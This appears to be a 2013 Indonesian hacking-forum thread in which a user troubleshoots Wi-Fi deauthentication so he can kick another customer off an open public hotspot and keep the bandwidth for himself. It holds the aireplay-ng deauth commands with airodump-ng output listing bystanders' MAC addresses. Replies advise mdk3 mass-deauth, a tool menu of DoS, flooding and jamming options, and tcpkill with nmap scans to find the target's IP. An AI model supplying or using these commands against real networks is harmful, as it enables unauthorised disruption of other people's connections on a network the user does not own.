Help...... !!! Kick client dari wifi ga berfungsi
#1
Saya menngunakan perintah aireplay-ng -0 1 -a b8:03:05:a9:70:40 -c 00:1E:64:45:AB:02 mon0

trus outputnya

13:28:33 Waiting for beacon frame (BSSID: B8:03:05:A9:70:40) on channel -1
13:28:43 No such BSSID available.
Please specify an ESSID (-e).


itu salahnya dmana yee..??
bingung jadinya

#2
sudah airodump-ng mon0 bro??

kl bisa kasih stepnya .. dari airmon-ng start wlan0

#3
(05-11-2013, 02:49 PM)xsan-lahci Wrote: sudah airodump-ng mon0 bro??

kl bisa kasih stepnya .. dari airmon-ng start wlan0

uda mas...

PETAMA
airmon-ng start wlan0

OUTPUTNYA

Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
784 avahi-daemon
791 avahi-daemon
1216 NetworkManager
1514 wpa_supplicant
20546 dhclient
Process with PID 20546 (dhclient) is running on interface wlan0


Interface Chipset Driver

wlan0 Unknown iwlwifi - [phy0]
(monitor mode enabled on mon0)

KEDUA

airodump-ng mon0

OUTPUTNYA

CH 11 ][ Elapsed: 1 min ][ 2013-05-11 14:04

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

20:AA:4B:A3:63:F9 -49 844 25605 311 11 54 OPN Hotspot : Galon

BSSID STATION PWR Rate Lost Packets Probes

20:AA:4B:A3:63:F9 B8:03:05:A9:70:40 0 36 -54 0 2071
20:AA:4B:A3:63:F9 20:7C:8F:77:B4:F0 -46 54 -54 2 3144 Hotspot : Galon Kupi
20:AA:4B:A3:63:F9 E4Big Grin5:3D:10Big GrinB:1C -50 54 -54 0 1641
20:AA:4B:A3:63:F9 00:1E:64:45:AB:02 -52 54 -54 10 545 Hotspot : Galon Kupi
20:AA:4B:A3:63:F9 44:6D:57:B5:8F:55 -55 54 -54 0 357 Hotspot : Galon Kupi
20:AA:4B:A3:63:F9 4C:EDBig GrinE:86:98:9C -57 54 -54 1 7967
20:AA:4B:A3:63:F9 88:9F:FA:A3:E0Big Grin5 -56 54 -54 1 2087
20:AA:4B:A3:63:F9 00:1E:64:47:10:C6 -57 54 - 1 29 571 Hotspot : Galon Kupi
20:AA:4B:A3:63:F9 00:25Big Grin3:96:6D:06 -58 48 -54 3 58
20:AA:4B:A3:63:F9 74:2F:68:A7:4E:27 -58 48 -54 30 2073
20:AA:4B:A3:63:F9 F0:7B:CB:6E:83:0D -59 54 -54 1 853 Hotspot : Galon Kupi
20:AA:4B:A3:63:F9 00:26:B6:68:1C:9C -63 54 -36 0 3118
20:AA:4B:A3:63:F9 D0Big GrinF:9A:92:9F:65 -68 54 -54 0 676 Hotspot : Galon Kupi
20:AA:4B:A3:63:F9 24:EC:99:00:F2:62 -74 11 -11 2 309
20:AA:4B:A3:63:F9 5C:AC:4C:90:21:33 -77 2 - 1 0 242


NEXT STEP saya pake
aireplay-ng -0 1 -a 20:AA:4B:A3:63:F9 -c 00:1E:64:45:AB:02 mon0

Sekarang malah autputnya
14:06:01 Waiting for beacon frame (BSSID: 20:AA:4B:A3:63:F9) on channel -1
14:06:01 mon0 is on channel -1, but the AP uses channel 11

nah itu gmna,,,, soalnya yg mau di kick cma 1 client

#4
wait wait .. itu OPN ?? berarti ga di password ya? wkwkwk kicknya tutup aja sekalian biar ente konek sendiri pake cara

mdk3 mon0 d -w whitelist.txt

tutorial mdk3 udh ada di sub menu ini :p

#5
(05-11-2013, 03:16 PM)xsan-lahci Wrote: wait wait .. itu OPN ?? berarti ga di password ya? wkwkwk kicknya tutup aja sekalian biar ente konek sendiri pake cara

mdk3 mon0 d -w whitelist.txt

tutorial mdk3 udh ada di sub menu ini :p

yaaahhhh,,,, kasian yg laen mas.. -_-

maunya cuma satu org aje,,, uda tau open,, malah download,, padahal ga blh download :p
(ane ndri download :p)

itu gmna ya ,, kalo kick 1 org aje

#6
pake tools ane coba CAST-V2 Big Grin ada buat kick 1 org atau 1000 orng hahaha http://indonesianbacktrack.or.id/forum/s...p?tid=4383

#7
(05-11-2013, 03:57 PM)xsan-lahci Wrote: pake tools ane coba CAST-V2 Big Grin ada buat kick 1 org atau 1000 orng hahaha /forum/showthread.php?tid=4383

bah,,,, itu uda ada mas...

1) Scan Live Host
2) Port Scaner
3) Network Trafic with Kismet
4) Network Monitoring with Netdiscover
5) Detect Netcut!
6) Blocked Access Point
7) Netcut With Tcpkill
8) Install Honeypot
9) Create Fake Access Point
10) DOS Attack With Hping3
11) UDP Flood with Udp.pl
12) Dos Attack With Slowloris
13) Flood Access Point
14) WifiJammer
15) Kick All Client From wifi
16) Network Forensic With Wireshark
17) Image Captures With driftnet
18) Credits And About
37) Exit
yg 1 org aje kan ga ada -_-

#8
no 7 broo :p netcut with tcpkill

#9
(05-11-2013, 05:49 PM)xsan-lahci Wrote: no 7 broo :p netcut with tcpkill

wkwkw,,,, target itu IP ya?

ane gag tau cara mengetahui ip org laen,, kan waktu airodum-ng yg nampak cma MAC nya,, jdi gmna tu,, bsa d kasi pencrahannya..
ato link tutor jga bsa Sad(

#10
iya itu pake tools ane bro Big Grin cara ngetahuin ip orng lain scann pake tools ane yang manggil nmap, pilih no 1 .. nanti nmap bakal ngasih report ada siapa aja yg konek






Users browsing this thread: 1 Guest(s)